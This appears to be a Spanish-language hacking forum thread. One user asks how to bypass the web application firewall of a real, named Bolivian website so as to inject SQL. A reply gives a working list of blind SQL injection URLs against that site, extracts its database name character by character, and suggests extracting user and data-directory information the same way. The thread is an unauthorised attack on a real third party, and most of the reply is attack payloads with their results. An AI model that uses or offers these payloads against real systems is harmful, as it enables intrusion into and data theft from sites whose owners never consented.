comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Como determinar que filtro utilizar para bypass WAF

  • 1 Respuestas
  • 1325 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado 1v@n

  • *
  • Underc0der
  • Mensajes: 14
  • Actividad:
    0%
  • Reputación 0
  • JIMR
    • Ver Perfil
  • Skype: jaime981@hotmail.com
« en: Diciembre 26, 2013, 05:38:45 pm »
saludos comunidad

me encontre con esta web,  http://www.pieb.com.bo/sipieb_nota.php?idn=8661
order by 27--

la cual  eh probado una serie de tecnicas de bypass para evadir el WAF pero hasta el momento no logro evadir si alguien puede aportar ayuda para descubrir  como evadir .

gracias...
« Última modificación: Septiembre 27, 2014, 09:52:07 am por Expermicid »

Desconectado q3rv0

  • *
  • Underc0der
  • Mensajes: 207
  • Actividad:
    0%
  • Reputación 1
  • %ERRORLEVEL%
    • Ver Perfil
    • q3rv0
    • Email
« Respuesta #1 en: Diciembre 26, 2013, 11:22:41 pm »
Estuve realizando testeos y el waf esta muy bien configurado por lo que se me hizo imposible evadir las restricciones, salvo que la unica informacion que pude obtener fue el nombre de la db con la siguiente consulta, utilizando la tecnica mysql blind, ya que no requeria de ciertas sentencias que se encuentran en la blacklist del firewall.

Código: MySQL
  1. http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),1,1))=112# ->p
  2. http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),2,1))=105# -> i
  3. http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),3,1))=101# -> e
  4. http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),4,1))=98# -> b
  5. http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),5,1))=100# -> d
  6. http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),6,1))=111# -> o
  7. http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),7,1))=109# -> m
  8. http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),8,1))=105# -> i
  9. http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),9,1))=95# -> _
  10. http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),10,1))=112# -> p
  11. http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),11,1))=105# -> i
  12.  
  13. http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),12,1))=101# -> e
  14. http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),13,1))=98#
->b

Database: piebdomi_pieb

asi mismo se podria obtener informacion de funciones como:user(), @@datadir, etc




 

¿Te gustó el post? COMPARTILO!



Crear un archivo .vbs para ejecutar un archivo .bat en invisible

Iniciado por NMS

Respuestas: 2
Vistas: 4977
Último mensaje Marzo 13, 2017, 10:37:57 pm
por sadfud
[SOLUCIONADO] Desencriptacion de una imagen para extraer la imagen original

Iniciado por stuxnet13

Respuestas: 3
Vistas: 1367
Último mensaje Enero 07, 2016, 07:55:01 pm
por blackdrake
allegro 5,opngl,sdk para fan game modo storyboard game

Iniciado por Mr.Tru

Respuestas: 2
Vistas: 430
Último mensaje Mayo 23, 2018, 01:19:20 pm
por Mr.Tru
[SOLUCIONADO] Ayuda para encontrar "airdecrypt"

Iniciado por Typh0n

Respuestas: 2
Vistas: 3998
Último mensaje Enero 13, 2014, 07:11:18 am
por aika
[SOLUCIONADO] ¿Algún método para jugar [LOL] en linux? Kali linux

Iniciado por RainelU

Respuestas: 9
Vistas: 1694
Último mensaje Enero 07, 2018, 01:24:54 am
por PikachuDorado